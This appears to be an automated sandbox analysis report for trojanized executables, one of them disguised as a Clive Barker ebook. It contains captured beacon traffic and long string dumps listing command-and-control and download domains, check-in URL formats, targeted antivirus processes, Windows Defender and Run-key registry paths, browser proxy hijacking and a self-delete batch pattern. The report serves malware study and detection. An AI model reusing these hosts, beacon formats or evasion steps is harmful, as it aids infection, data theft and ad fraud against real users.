Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Content-Length: 54007

Cache-Control: max-age=6822

Date: Sat, 29 Mar 2014 01:55:29 GMT

Connection: close

X-CCC: SE

X-CID: 2

MSCF............,...................I.................lDxa .authroot.stl......8..CK...<T...g.v!M.d..f.%d..}K..5..F..d'K......%K..%...!..=.k..........{=/....{g.~..........<.....h..b...8..Ep.x.....G. .....pq..``a.i|"n|8...!..gv...: I........!...%$....;PBHA.....!A....L...'...:..0...I....fD"N#...._..?....E..m..1\.$...{P....:......../...\YB.m:.....dE.....)...V....$....Dn:....0E..S."...o..q.....K...I..K...(x%....>A.R...`.0 .........<`L0mp...%....y.....g.n...R0Op..<..,....`0$z.@....x"....T..H...<.CQ..H.M.K.".H....`.....!.G....AF\.{...V..LCy.i y..Q.'..M...bE.%..<...nG.3..\K.t..ah...5Z~.h...8..@.).... ....X...v..,.-.M..u.......Z"..U...0:O%..}.(t............=R.......[b...z.....8..)........M|..g..L.a...>....[.E&..{..|..t...[t..B......./[..&.L`.w....[L..ZW.... ."....<...I.G\.H[:...B.B.qT... ..(....: U....(.J.....?._..'..Hp..o.B......!......bj.G.u^.%\r..b...*7.[nO..S...b.l@jn. .Hb...M.....9.....8.='...)\.....M.#.M......L.Jh.../..G.!\.Y....&.....P^...,..U..3...W...._...0..?*...KZ....fM...8.6U..aG.a.......~....?.N. .3.....,>.rH..*O..E..T0.......?i...k.T.'>".....E....%SK.v..8...t.:...].E.K2....u..../i.t.9....2N..QI ..h..t..Ad....0.........*...R......|......7A:bP. n:.......Fk.[q....]D.......3.0.)...G]..?4.o...p......?...3....@..jn#.n\.-....p.T..G............4.......:H....2..9.|.`~0GL.=....u.y...L0iL.....A....^.=_.....5.=.=n.@....Hu..r#.T...{.......P.....[..j.....i.%...d...h.........c......9m...@.....W.p.E.5.@......]%..g.1..3Z6^<!.Q...m......9....l..x.....$7..[.....L........L....F*....D.U.'...

<<

<<< skipped >>>

GET /msdownload/update/v3/static/trustedr/en/authrootseq.txt HTTP/1.1

Connection: close

Accept: */*

User-Agent: Microsoft-CryptoAPI/5.131.2600.5512

Host: VVV.download.windowsupdate.com

Pragma: no-cache

HTTP/1.1 200 OK

Content-Type: text/plain

Last-Modified: Wed, 12 Mar 2014 05:29:31 GMT

Accept-Ranges: bytes

ETag: "806f4cbb43dcf1:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Content-Length: 18

Date: Sat, 29 Mar 2014 01:55:29 GMT

Connection: close

X-CCC: SE

X-CID: 2

1401CF3DB40B609892..

GET /logo.png?tq=gHZutHoLpb2HdjbiNAjrpsSCJbO+V98lHA==&pr=41 HTTP/1.0

Connection: close

Host: worldorderlive.com

Accept: */*

User-Agent: chrome/9.0

HTTP/1.0 200 (OK)

Cache-Control: private, no-cache, must-revalidate

Connection: Keep-Alive

Pragma: no-cache

Server: Oversee Turing v1.0.0

Content-Length: 1420

Content-Type: text/html

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Keep-Alive: timeout=3, max=81

P3P: policyref="hXXp://VVV.dsparking.com/w3c/p3p.xml", CP="NOI DSP COR ADMa OUR NOR STA"

Set-Cookie: parkinglot=1; domain=.worldorderlive.com; path=/; expires=Sun, 30-Mar-2014 01:55:28 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "hXXp://VVV.w3.org/TR/html4/frameset.dtd">..<html>. <head>. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />.. <title>worldorderlive.com</title>. <meta name="keywords" content="worldorderlive.com" />. <meta name="description" content="worldorderlive.com" />. <meta name="robots" content="index, follow" />. <meta name="revisit-after" content="10" />... <meta name="viewport" content="width=device-width, initial-scale=1.0" /> ... . <script type="text/javascript">. document.cookie = "jsc=1";. </script>.. </head>. <frameset rows="100%,*" frameborder="no" border="0" framespacing="0">. <frame src="hXXp://worldorderlive.com?epl=RVMWgRUNFl9uv0mXknhcMBAX03sPCYVTJHfx37ALuc5zKR4B0YzLPUzkDwlng5k0JCJAKyBzgIht74zgzNBNaJ8VPEHChTFReDJHHEUhQi75jIVtRUWKIwyukB2sdbchwtlqkZm3Yapi2Y7mT92nlGYaGiTTaHqaakJPDZA8NA0amXpQT3pUQ5UAIJDfr78AAGB_AQAAQIDbCgAAcTG991lTJllBMTZoWkKdAAAA8A" name="worldorderlive.com">. </frameset>. <noframes>..<body><a href="hXXp://worldorderlive.com?epl=RVMWgRUNFl9uv0mXknhcMBAX03sPCYVTJHfx37ALuc5zKR4B0YzLPUzkDwlng5k0JCJAKyBzgIht74zgzNBNaJ8VPEHChTFReDJHHEUhQi75jIVtRUWKIwyukB2sdbchwtlqkZm3Yapi2Y7mT92nlGYaGiTTaHqaakJPDZA8NA0amXpQT3pUQ5UAIJDfr78AAGB_AQAAQIDbCgAAcTG991lTJllBMTZoWkKdAAAA8A">Click here to go to worldorderlive.com</a>.</body>

<<

<<< skipped >>>

Map

Strings from Dumps

Clive Barker - Books Of Blood 03.exe_172:

.text

`.rdata

@.data

@.rsrc

WSSSSh

^SShq

SSSh4&A

SSh<'A</pre><pre>%.*s(%d)%s</pre><pre>rtmp%d</pre><pre><head><meta http-equiv="content-type" content="text/html; charset=</pre><pre>shlwapi.dll</pre><pre>%s %s</pre><pre>%s %s %s</pre><pre>GETPASSWORD1</pre><pre>%s%s%d</pre><pre>Software\Microsoft\Windows\CurrentVersion</pre><pre>%s.%d.tmp</pre><pre>winrarsfxmappingfile.tmp</pre><pre>-el -s2 "-d%s" "-p%s" "-sp%s"</pre><pre>__tmp_rar_sfx_access_check_%u</pre><pre>sfxcmd</pre><pre>COMCTL32.DLL</pre><pre>riched20.dll</pre><pre>riched32.dll</pre><pre>COMCTL32.dll</pre><pre>GetProcessHeap</pre><pre>GetCPInfo</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>GDI32.dll</pre><pre>COMDLG32.dll</pre><pre>RegCloseKey</pre><pre>RegCreateKeyExA</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>SHFileOperationA</pre><pre>ShellExecuteExA</pre><pre>SHELL32.dll</pre><pre>ole32.dll</pre><pre>OLEAUT32.dll</pre><pre>WINRAR.SFX</pre><pre>d:\Projects\WinRAR\SFX\build\sfxrar32\Release\sfxrar.pdb</pre><pre>C:\DOCUME~1\test\LOCALS~1\Temp\nsp4.tmp\Clive Barker - Books Of Blood 03.exe</pre><pre>:(,4;<=>;?@</pre><pre>3,45657879</pre><pre>8888888888887</pre><pre>version="1.0.0.0"</pre><pre><requestedExecutionLevel level="asInvoker"</pre><pre>name="Microsoft.Windows.Common-Controls"</pre><pre>version="6.0.0.0"</pre><pre>publicKeyToken="6595b64144ccf1df"</pre><pre></pre><pre><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></pre><pre></pre><pre><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/></pre><pre><asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings"></pre><pre></asmv3:windowsSettings></pre><pre>Shell.Explorer</pre><pre>Enter password</pre><pre>&Enter password for the encrypted file:</pre><pre>Extracting %s</pre><pre>Skipping %s</pre><pre>The file "%s" header is corrupt%The archive comment header is corrupt</pre><pre>Unknown method in %s</pre><pre>Cannot open %s</pre><pre>Cannot create %s</pre><pre>Cannot create folder %s</pre><pre>6CRC failed in the encrypted file %s (wrong password ?)</pre><pre>CRC failed in %s</pre><pre>Packed data CRC failed in %s</pre><pre>Wrong password for %s5Write error in the file %s. Probably the disk is full</pre><pre>Read error in the file %s</pre><pre>Extracting from %s</pre><pre>ErroraErrors encountered while performing the operation</pre><pre>Please close all applications, reboot Windows and restart this installation\Some installation files are corrupt.</pre><b>3R2R.exe_1728:</b><pre>`.rsrc</pre><pre>PSSh$</pre><pre>SSShbU@</pre><pre>SSj%S</pre><pre><%u,V</pre><pre><3%u1f</pre><pre>GetProcessWindowStation</pre><pre>operator</pre><pre>deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler</pre><pre>1.2.5</pre><pre>inflate 1.2.5 Copyright 1995-2010 Mark Adler</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall</pre><pre>\sc.exe</pre><pre>ntdll.dll</pre><pre>iexplore.exe</pre><pre>opera.exe</pre><pre>firefox.exe</pre><pre>safari.exe</pre><pre>chrome.exe</pre><pre>AVGIDSMonitor.exe</pre><pre>AVGIDSAgent.exe</pre><pre>avgchsvx.exe</pre><pre>avgemcx.exe</pre><pre>avgnsx.exe</pre><pre>avgrsx.exe</pre><pre>avgtray.exe</pre><pre>avgwdsvc.exe</pre><pre>avgnt.exe</pre><pre>ccsvchst.exe</pre><pre>AvastUI.exe</pre><pre>mcagent.exe</pre><pre>SOFTWARE\Microsoft\Windows Defender\Real-Time Protection</pre><pre>SOFTWARE\Microsoft\Windows Defender</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer</pre><pre>explorer.exe</pre><pre>Windows Security Center</pre><pre>%s\shell32.dll,Control_RunDLL "%s\wscui.cpl",Security Center</pre><pre>rundll32.exe</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Run</pre><pre>Windows Defender</pre><pre>at %d:%d "%s" %s</pre><pre>win32iexplore.exe</pre><pre>win32opera.exe</pre><pre>win32firefox.exe</pre><pre>win32safari.exe</pre><pre>win32winword.exe</pre><pre>win32excel.exe</pre><pre>win32outlook.exe</pre><pre>win32photoshop.exe</pre><pre>win32wmplayer.exe</pre><pre>win32java.exe</pre><pre>win32itunes.exe</pre><pre>win32msmsgs.exe</pre><pre>java.exe</pre><pre>*.log</pre><pre>%s:\windows\system32\%s.tmp</pre><pre>%s:\windows\syswow64\%s.tmp</pre><pre>%s:\WINNT\system32\%s.tmp</pre><pre>%s:\WINNT\syswow64\%s.tmp</pre><pre>Find Temporary files is %d</pre><pre>cannot open files %s, Open next files ?</pre><pre>{A1D429DE-B782-4253-84AD-6E09A8438AD5}</pre><pre>\Windows NT</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>%s\%s</pre><pre>%s.%s</pre><pre>stor.cfg</pre><pre>exec%s</pre><pre>{35BCA615-C82A-4152-8857-BCC626AE4C8D}</pre><pre>{4D92BB9F-9A66-458f-ACA4-66172A7016D4}</pre><pre>lvvm.exe</pre><pre>{C0429A47-0CF0-4d1b-9616-C588FA0A3DDB}</pre><pre>{43B671F0-5D50-4dbe-AD9C-64A6167C57AD}</pre><pre>{6B985724-623F-492e-B0D6-C9715ADE853B}</pre><pre>{B37C48AF-B05C-4520-8B38-2FE181D5DC78}</pre><pre>{95F6585C-CC1E-4b52-A63B-9FBC6A94F371}</pre><pre>Advapi32.dll</pre><pre>%s%s_1</pre><pre>%s_0_%d_%s</pre><pre>%s_%d</pre><pre>%s_%d_%d_%d_%d</pre><pre>%s_%s</pre><pre>http://</pre><pre>POST %s HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: mozilla/2.0</pre><pre>Content-Length: %u</pre><pre>POST http://%s%s HTTP/1.1</pre><pre>HTTP/1.0 200 OK</pre><pre>HTTP/1.1 200 OK</pre><pre>%s?tq=%s</pre><pre>id=%s&p3=0&p4=0&hwid=%s&c=%d&nax=7&ver=111</pre><pre>%s_%s_%d</pre><pre>_1_%d</pre><pre>_2_%d</pre><pre>_3_%d</pre><pre>_4_%d</pre><pre>http://worldorderlive.com</pre><pre>http://rumperstumprs.com</pre><pre>http://transaerosystems.com</pre><pre>http://freeridershools.com</pre><pre>http://ourbigdrophills.com</pre><pre>http://mydbonlineaccess.com</pre><pre>http://onlinepdahelpforyou.com</pre><pre>http://remarkreddomas.com</pre><pre>http://transfersakkonline.com</pre><pre>http://backupdomaintolevel.com</pre><pre>SELECT_RESERV_SRV_%d</pre><pre>%s_%d_%s</pre><pre>id=%s&c=%d</pre><pre>%s_%d_%d_%d</pre><pre>%s_%d_%d</pre><pre>%s %s</pre><pre>%s start%s%c%s</pre><pre>c1.exe</pre><pre>c2.exe</pre><pre>c3.exe</pre><pre>DWN_CON_STRP_%d_%s</pre><pre>http://%d.ctrl.%s</pre><pre>logo.png</pre><pre>img/135.png</pre><pre>img/136.png</pre><pre>t=%s&p4=0&q=%s&z22=0&s=%d&hrs=%d</pre><pre>t=%s&q=&s=%d&hrs=%d</pre><pre>%s/%s?tq=%s&pr=%d</pre><pre>%s:%d/%s?tq=%s&pr=%d</pre><pre>http://armoredlegion.com/305986.png</pre><pre>http://armoredlegion.com/16354.png</pre><pre>http://armoredlegion.com/716354_m61.png</pre><pre>http://mektek.net/thelab/wiley.jpg</pre><pre>http://knowledgesutra.com/img/temp/hi.cgi</pre><pre>http://knowledgesutra.com/img/temp/head.png</pre><pre>http://battleon.com/134.gif</pre><pre>http://battleon.com/132.gif</pre><pre>http://battleon.com/133.gif</pre><pre>http://browsermmorpg.com/images/cpc.png</pre><pre>http://browsermmorpg.com/images/cpc2.png</pre><pre>http://browsermmorpg.com/img/intel.gif</pre><pre>http://browsermmorpg.com/img/intel.jpg</pre><pre>http://012webpages.com/christian12.jpg</pre><pre>http://012webpages.com/christian13.jpg</pre><pre>http://012webpages.com/christian14.jpg</pre><pre>http://tri-countymech.com/g/livechat.png</pre><pre>http://tri-countymech.com/g/logo.png</pre><pre>http://tri-countymech.com/g/133.jpg</pre><pre>http://tri-countymech.com/g/134.jpg</pre><pre>http://electronicstheory.com/pics/valley.png</pre><pre>http://electronicstheory.com/pics/sun.png</pre><pre>http://classicbattletech.com/lhous3.gif</pre><pre>http://classicbattletech.com/lhous4.gif</pre><pre>http://classicbattletech.com/lhous5.gif</pre><pre>http://classicbattletech.com/lhous6.gif</pre><pre>http://engineeringcrossing.com/images/misc/23525.png</pre><pre>http://engineeringcrossing.com/images/misc/64646.png</pre><pre>t=t&hrs=%d&q=id=1000&ver=%s&s=%d</pre><pre>t=ip&hrs=%d&q=&s=1</pre><pre>%s?pr=%s</pre><pre>\bl%d_64.bat</pre><pre>del "%s"</pre><pre>if exist "%s" goto a</pre><pre>cmd.exe /c "%s"</pre><pre>%s.zl</pre><pre>{ÕD9E4E0-906C-4B81-B1BF-2E9A76248146}_%d</pre><pre>{C66E79CE-8935-4ed9-A6B1-4983619CB925}</pre><pre>{61B98B86-5F44-42b3-BCA1-33904B067B81}</pre><pre>{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}</pre><pre>{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}</pre><pre>GET %s HTTP/1.0</pre><pre>http://xprstats.com/images/logo.png</pre><pre>drweb</pre><pre>id=%s&hwid=%s&ver=%d&os=%s&av=%s&wd=%d&fw=%s&port=%d</pre><pre>t=ml&q=%s</pre><pre>xprstats.com</pre><pre>http://%s%s</pre><pre>ldr.ini</pre><pre>reportfrommains.com</pre><pre>http://%s/s.php?c=121&id=%s</pre><pre>onlinereportsystem.com</pre><pre>%s_1_%d_%s</pre><pre>%s_2_%d_%s</pre><pre>%s_3_%d_%s</pre><pre>%s_4_%d_%s</pre><pre>pmv=2&id=%s&hwid=%s</pre><pre>u.exe</pre><pre>%s up%s</pre><pre>&%s=%s</pre><pre>PRM_LSTN_THIS_PORT</pre><pre>127.0.0.1</pre><pre>HTTP/1.x</pre><pre>google.com</pre><pre>http://www.google.com</pre><pre>HTTP/1.1 302 Found</pre><pre>Location: %s</pre><pre>id=%s&type=%d&ppcid=%s</pre><pre>%s: %s</pre><pre>%s_5_%s</pre><pre>http=127.0.0.1:</pre><pre>prefs.js</pre><pre>Mozilla</pre><pre>"network.proxy.http"</pre><pre>"network.proxy.http_port"</pre><pre>"network.proxy.type"</pre><pre>"127.0.0.1"</pre><pre>%s(%s, %s);</pre><pre>operaprefs.ini</pre><pre>Opera</pre><pre>Use HTTP</pre><pre>HTTP server</pre><pre>127.0.0.1:%s</pre><pre>%s=%s</pre><pre>%s:%s</pre><pre>hwid=%s&yui=2&id=%s&step=1&wd=%d&rvn=56&av=%s</pre><pre>id=%s&hwid=%s</pre><pre>exec|%s</pre><pre>http=</pre><pre><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /></pre><pre>bing.com</pre><pre>yahoo.com</pre><pre>search.aol.</pre><pre>suche.aol.</pre><pre>searcht2.aol.</pre><pre>.yimg.com</pre><pre>.bing.net</pre><pre>scorecardresearch.com</pre><pre>brightcove.com</pre><pre>.aol.</pre><pre>.atwola.</pre><pre>.ivwbox.</pre><pre>.google</pre><pre>.atdmt.</pre><pre>.abmr.</pre><pre>.tacoda.</pre><pre>.adtechus.</pre><pre>.autodatadirect.</pre><pre>.mapquestapi.</pre><pre>.ggpht.</pre><pre>.virtualearth.</pre><pre>.opera.</pre><pre>.microsoft.</pre><pre>.wsod.</pre><pre>.doubleclick.</pre><pre>.ypcdn.</pre><pre>.truveo.</pre><pre>.tlowdb.</pre><pre>mapq.st</pre><pre>.dartsearch.</pre><pre>.thawte.</pre><pre>http://</pre><pre>bing.com/search</pre><pre>search.yahoo.com/search</pre><pre>%s_1_%s</pre><pre>err%d%s_%d_%d</pre><pre>err0%s_%d_%d</pre><pre>ver=111&system=%d&id=%s&hwid=%s&search=%s&referer=%s&useragent=%s&lang=%s&type=%d</pre><pre>%s:443/%s</pre><pre>%s_2_%s</pre><pre>%s_%s_%s</pre><pre>%s_3_%s</pre><pre>www.www.ru</pre><pre>https://</pre><pre>.doubleclick.net</pre><pre>doubleclick.net</pre><pre>msn.com</pre><pre>%s_0%d_%d</pre><pre>=='undefined'?'%s':'%s'

.referrer

HTTP/1.0

User-Agent: chrome/9.0

%s %s %s

http://www.google.com/

http://www.yahoo.com/

.class

.midi

google_ad.url

google_ad.title

r.msn.com

google_ad.line1

zcÁ

C:\DOCUME~1\test\LOCALS~1\Temp\nsp4.tmp\3R2R.exe

%Program Files%\C6249

%Documents and Settings%\%current user%\Application Data\649C6

%Program Files%\LP\4566

.text

`.rdata

@.data

.rsrc

8888888

N ssh

hssHe

w:.WM

IPHLPAPI.DLL

EnumChildWindows

newdev.dll

SHELL32.dll

SETUPAPI.dll

MPRAPI.dll

KERNEL32.dll

GetCPInfo

EY%Snkx

GetProcessHeap

RegCreateKeyExA

RegCloseKey

RegOpenKeyExA

RegFlushKey

ShellExecuteA

SHDeleteKeyA

keybd_event

EnumWindows

WinHttpOpenRequest

WinHttpQueryDataAvailable

WinHttpCloseHandle

WinHttpConnect

WinHttpSendRequest

WinHttpReceiveResponse

WinHttpReadData

WinHttpOpen

KERNEL32.DLL

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

PSAPI.DLL

RASAPI32.dll

RPCRT4.dll

SHLWAPI.dll

USER32.dll

WINHTTP.dll

WININET.dll

WS2_32.dll

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

mscoree.dll

WUSER32.DLL

\Registry\Machine\System\CurrentControlSet\Services\%s

Dr.Web

mhttp=127.0.0.1:%d

http://www.yahoo.com

2.0.2.1

3R2R.exe_1728_rwx_00400000_00068000:

`.rsrc

PSSh$

SSShbU@

SSj%S

<%u,V

<3%u1f

GetProcessWindowStation

operator

1.2.5

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

\sc.exe

ntdll.dll

iexplore.exe

opera.exe

firefox.exe

safari.exe

chrome.exe

AVGIDSMonitor.exe

AVGIDSAgent.exe

avgchsvx.exe

avgemcx.exe

avgnsx.exe

avgrsx.exe

avgtray.exe

avgwdsvc.exe

avgnt.exe

ccsvchst.exe

AvastUI.exe

mcagent.exe

SOFTWARE\Microsoft\Windows Defender\Real-Time Protection

SOFTWARE\Microsoft\Windows Defender

SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer

explorer.exe

Windows Security Center

%s\shell32.dll,Control_RunDLL "%s\wscui.cpl",Security Center

rundll32.exe

SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Windows Defender

at %d:%d "%s" %s

win32iexplore.exe

win32opera.exe

win32firefox.exe

win32safari.exe

win32winword.exe

win32excel.exe

win32outlook.exe

win32photoshop.exe

win32wmplayer.exe

win32java.exe

win32itunes.exe

win32msmsgs.exe

java.exe

*.log

%s:\windows\system32\%s.tmp

%s:\windows\syswow64\%s.tmp

%s:\WINNT\system32\%s.tmp

%s:\WINNT\syswow64\%s.tmp

Find Temporary files is %d

cannot open files %s, Open next files ?

{A1D429DE-B782-4253-84AD-6E09A8438AD5}

\Windows NT

Software\Microsoft\Windows\CurrentVersion\Run

%s\%s

%s.%s

stor.cfg

exec%s

{35BCA615-C82A-4152-8857-BCC626AE4C8D}

{4D92BB9F-9A66-458f-ACA4-66172A7016D4}

lvvm.exe

{C0429A47-0CF0-4d1b-9616-C588FA0A3DDB}

{43B671F0-5D50-4dbe-AD9C-64A6167C57AD}

{6B985724-623F-492e-B0D6-C9715ADE853B}

{B37C48AF-B05C-4520-8B38-2FE181D5DC78}

{95F6585C-CC1E-4b52-A63B-9FBC6A94F371}

Advapi32.dll

%s%s_1

%s_0_%d_%s

%s_%d

%s_%d_%d_%d_%d

%s_%s

http://

POST %s HTTP/1.1

Host: %s

User-Agent: mozilla/2.0

Content-Length: %u

POST http://%s%s HTTP/1.1

HTTP/1.0 200 OK

HTTP/1.1 200 OK

%s?tq=%s

id=%s&p3=0&p4=0&hwid=%s&c=%d&nax=7&ver=111

%s_%s_%d

_1_%d

_2_%d

_3_%d

_4_%d

http://worldorderlive.com

http://rumperstumprs.com

http://transaerosystems.com

http://freeridershools.com

http://ourbigdrophills.com

http://mydbonlineaccess.com

http://onlinepdahelpforyou.com

http://remarkreddomas.com

http://transfersakkonline.com

http://backupdomaintolevel.com

SELECT_RESERV_SRV_%d

%s_%d_%s

id=%s&c=%d

%s_%d_%d_%d

%s_%d_%d

%s %s

%s start%s%c%s

c1.exe

c2.exe

c3.exe

DWN_CON_STRP_%d_%s

http://%d.ctrl.%s

logo.png

img/135.png

img/136.png

t=%s&p4=0&q=%s&z22=0&s=%d&hrs=%d

t=%s&q=&s=%d&hrs=%d

%s/%s?tq=%s&pr=%d

%s:%d/%s?tq=%s&pr=%d

http://armoredlegion.com/305986.png

http://armoredlegion.com/16354.png

http://armoredlegion.com/716354_m61.png

http://mektek.net/thelab/wiley.jpg

http://knowledgesutra.com/img/temp/hi.cgi

http://knowledgesutra.com/img/temp/head.png

http://battleon.com/134.gif

http://battleon.com/132.gif

http://battleon.com/133.gif

http://browsermmorpg.com/images/cpc.png

http://browsermmorpg.com/images/cpc2.png

http://browsermmorpg.com/img/intel.gif

http://browsermmorpg.com/img/intel.jpg

http://012webpages.com/christian12.jpg

http://012webpages.com/christian13.jpg

http://012webpages.com/christian14.jpg

http://tri-countymech.com/g/livechat.png

http://tri-countymech.com/g/logo.png

http://tri-countymech.com/g/133.jpg

http://tri-countymech.com/g/134.jpg

http://electronicstheory.com/pics/valley.png

http://electronicstheory.com/pics/sun.png

http://classicbattletech.com/lhous3.gif

http://classicbattletech.com/lhous4.gif

http://classicbattletech.com/lhous5.gif

http://classicbattletech.com/lhous6.gif

http://engineeringcrossing.com/images/misc/23525.png

http://engineeringcrossing.com/images/misc/64646.png

t=t&hrs=%d&q=id=1000&ver=%s&s=%d

t=ip&hrs=%d&q=&s=1

%s?pr=%s

\bl%d_64.bat

del "%s"

if exist "%s" goto a

cmd.exe /c "%s"

%s.zl

{ÕD9E4E0-906C-4B81-B1BF-2E9A76248146}_%d

{C66E79CE-8935-4ed9-A6B1-4983619CB925}

{61B98B86-5F44-42b3-BCA1-33904B067B81}

{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}

{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}

GET %s HTTP/1.0

http://xprstats.com/images/logo.png

drweb

id=%s&hwid=%s&ver=%d&os=%s&av=%s&wd=%d&fw=%s&port=%d

t=ml&q=%s

xprstats.com

http://%s%s

ldr.ini

reportfrommains.com

http://%s/s.php?c=121&id=%s

onlinereportsystem.com

%s_1_%d_%s

%s_2_%d_%s

%s_3_%d_%s

%s_4_%d_%s

pmv=2&id=%s&hwid=%s

u.exe

%s up%s

&%s=%s

PRM_LSTN_THIS_PORT

127.0.0.1

HTTP/1.x

google.com

http://www.google.com

HTTP/1.1 302 Found

Location: %s

id=%s&type=%d&ppcid=%s

%s: %s

%s_5_%s

http=127.0.0.1:

prefs.js

Mozilla

"network.proxy.http"

"network.proxy.http_port"

"network.proxy.type"

"127.0.0.1"

%s(%s, %s);

operaprefs.ini

Opera

Use HTTP

HTTP server

127.0.0.1:%s

%s=%s

%s:%s

hwid=%s&yui=2&id=%s&step=1&wd=%d&rvn=56&av=%s

id=%s&hwid=%s

exec|%s

http=

bing.com

yahoo.com

search.aol.

suche.aol.

searcht2.aol.

.yimg.com

.bing.net

scorecardresearch.com

brightcove.com

.aol.

.atwola.

.ivwbox.

.google

.atdmt.

.abmr.

.tacoda.

.adtechus.

.autodatadirect.

.mapquestapi.

.ggpht.

.virtualearth.

.opera.

.microsoft.

.wsod.

.doubleclick.

.ypcdn.

.truveo.

.tlowdb.

mapq.st

.dartsearch.

.thawte.

http://

bing.com/search

search.yahoo.com/search

%s_1_%s

err%d%s_%d_%d

err0%s_%d_%d

ver=111&system=%d&id=%s&hwid=%s&search=%s&referer=%s&useragent=%s&lang=%s&type=%d

%s:443/%s

%s_2_%s

%s_%s_%s

%s_3_%s

www.www.ru

https://

.doubleclick.net

doubleclick.net

msn.com

%s_0%d_%d

=='undefined'?'%s':'%s'

.referrer

HTTP/1.0

User-Agent: chrome/9.0

%s %s %s

http://www.google.com/

http://www.yahoo.com/

.class

.midi

google_ad.url

google_ad.title

r.msn.com

google_ad.line1

zcÁ

C:\DOCUME~1\test\LOCALS~1\Temp\nsp4.tmp\3R2R.exe

%Program Files%\C6249

%Documents and Settings%\%current user%\Application Data\649C6

%Program Files%\LP\4566

.text

`.rdata

@.data

.rsrc

8888888

N ssh

hssHe

w:.WM

IPHLPAPI.DLL

EnumChildWindows

newdev.dll

SHELL32.dll

SETUPAPI.dll

MPRAPI.dll

KERNEL32.dll

GetCPInfo

EY%Snkx

GetProcessHeap

RegCreateKeyExA

RegCloseKey

RegOpenKeyExA

RegFlushKey

ShellExecuteA

SHDeleteKeyA

keybd_event

EnumWindows

WinHttpOpenRequest

WinHttpQueryDataAvailable

WinHttpCloseHandle

WinHttpConnect

WinHttpSendRequest

WinHttpReceiveResponse

WinHttpReadData

WinHttpOpen

KERNEL32.DLL

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

PSAPI.DLL

RASAPI32.dll

RPCRT4.dll

SHLWAPI.dll

USER32.dll

WINHTTP.dll

WININET.dll

WS2_32.dll

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

mscoree.dll

WUSER32.DLL

\Registry\Machine\System\CurrentControlSet\Services\%s

Dr.Web

mhttp=127.0.0.1:%d

http://www.yahoo.com

2.0.2.1

Explorer.EXE_1644_rwx_01370000_0000A000:

&ew%.YY

ver76%sdhpj

SafariChromeFi~

PSShx47

.exeu]

%sdhpjelxr.php?adv=adv401&code1=%s&code2=%s&id=%d&p=%s&b=%s&c=%d

Chrome

Firefox

Opera

%sgkih.exe

%subsnltn.php?adv=adv401&id=%d&c=%d

%sdesk.exe

%sjnupkvq.php?adv=adv401&id=%d&c=%d

%splmnimmi.exe

%srvdojqpje.php?adv=adv401&id=%d&c=%d

%snkamk.exe

%sevpxez.php?adv=adv401&id=%d&c=%d

%sgywaume.exe

%simgbidoje.php?adv=adv401&id=%d&c=%d

%snildxk.exe

%sarzgbzhf.php?adv=adv401&id=%d&c=%d

%ssqpvrlh.exe

%sizucahpkip.php?adv=adv401&id=%d&c=%d

%scmameeao.exe

%snvmkfmhfa.php?adv=adv401&id=%d&c=%d

%smuis.exe

%sjwezxfzk.php?adv=adv401&id=%d&c=%d

%sdsdfca.exe

%swqtkipkiqk.php?adv=adv401&id=%d&c=%d

%suxwdet.exe

%szdlfahcaip.php?adv=adv401&id=%d&c=%d

%sctbidkjq.php?adv=adv401&id=%d&c=%d

http://bascheme.com/dpxezto/

http://aahacker.com/dpxezto/

psapi.dll

ddraw.dll

urlmon.dll

shell32.dll

kernel32.dll

user32.dll

wininet.dll

ntdll.dll

\svchost.exe

explorer.exe

C:\DOCUME~1\test\LOCALS~1\Temp\nsp4.tmp\2 Gansta.exe

ShellExecuteExA

InternetOpenUrlA

.text

`.rdata

@.data

.reloc

KERNEL32.DLL

ADVAPI32.dll

DDRAW.dll

PSAPI.DLL

SHELL32.dll

SHLWAPI.dll

USER32.dll

WININET.dll

Summary

Dynamic Analysis

Removals

Static Analysis

Network Activity

Map

Strings from Dumps